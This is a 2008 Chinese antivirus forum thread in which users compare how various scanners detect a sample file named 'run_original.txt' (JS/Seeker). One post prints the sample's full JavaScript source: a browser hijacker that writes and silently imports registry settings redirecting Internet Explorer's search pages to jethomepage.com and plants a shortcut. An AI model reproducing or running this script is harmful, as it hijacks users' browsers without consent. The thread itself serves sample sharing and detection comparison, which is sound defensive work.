这什么东西。。

显示全部楼层 · 发表于 2008-1-4 22:58:05

from : 62nds.com/62nds/documents/run_original.txt
avast : Win32:Sitex-B [Trj]

显示全部楼层 · 发表于 2008-1-4 22:58:59

在文件 C:\Documents and Settings\Administrator\桌面\run_original\run_original.txt 中发现恶意代码。
感染: Trojan.JS.Seeker.b
操作: 已删除文件。
这是木马

显示全部楼层 · 发表于 2008-1-4 23:04:16

Warning: A virus or unwanted program has been found in the HTTP Data.

Requested URL: bbs.kafan.cn/attachment.php?aid=178990
Information: Contains detection pattern of the Java script virus JS/Seeker.b.2

Generated by AntiVir WebGuard 7.01.00.13, AVE 7.6.0.46, VDF 7.0.1.192

显示全部楼层 · 发表于 2008-1-4 23:06:36

Kaspersky Internet Security 7.0
The requested URL http://bbs.kafan.cn/attachment.php?aid=178990 is infected with Trojan.JS.Seeker.b virus

显示全部楼层 · 发表于 2008-1-4 23:07:38

txt?
nod报
C:\Documents and Settings\GUNDAM\桌面\run_original.rar » RAR » run_original.txt - probably a variant of JS/Seeker.A virus

显示全部楼层 · 发表于 2008-1-4 23:26:20

McAfee JS/Seeker.gen.a

显示全部楼层 · 发表于 2008-1-4 23:27:52

function sEr(){self.close();return true;}
window.onerror=sEr;
fs=new ActiveXObject('Scripting.FileSystemObject');
wd='C:\\Windows\\';
t2=fs.CreateTextFile(wd+'homereg111.reg');
t2.WriteLine('REGEDIT4');
t2.WriteLine('');
t2.WriteLine('[HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main]');
t2.WriteLine('"Search Bar"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('"Default_Search_URL"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('"Search Page"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Search]');
t2.WriteLine('"SearchAssistant"="http://www.jethomepage.com/search.htm"');
t2.WriteLine('');
t2.close();
wsh.Run(wd+'Regedit.exe -e '+wd+'backup1.reg "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\Main"'); wsh.Run(wd+'Regedit.exe -e '+wd+'backup2.reg "HKEY_CURRENT_USER\\Software\\Microsoft\\Internet Explorer\\Main"'); wsh.Run(wd+'Regedit.exe -s '+wd+'homereg111.reg');
wd='C:\\Windows\\Favorites\\Links\\';
fs=new ActiveXObject('Scripting.FileSystemObject');t2=fs.CreateTextFile(wd+'Search The Web.url');t2.WriteLine('[InternetShortcut]');t2.WriteLine('URL=http://www.jethomepage.com/');t2.WriteLine('Modified=A0BEC84AF780BE01A6');t2.WriteLine('IconFile=http://www.jethomepage.com/favicon.ico');t2.WriteLine('');t2.close();wsh.Run('c:\\removeit.hta');
self.close();

复制代码

startpager

显示全部楼层 · 发表于 2008-1-4 23:30:13

被AVAST阻止，不知道如何贴日志

显示全部楼层 · 发表于 2008-1-4 23:31:31

靠！一向敏感的红伞竟然不报，还是NOD32关键时候靠得住！

显示全部楼层 · 发表于 2008-1-4 23:39:14

原帖由 kbsj1234 于 2008-1-4 23:31 发表
靠！一向敏感的红伞竟然不报，还是NOD32关键时候靠得住！

[DETECTION] Contains detection pattern of the Java script virus JS/Seeker.b.2

[病毒样本] 这什么东西。。

本帖子中包含更多资源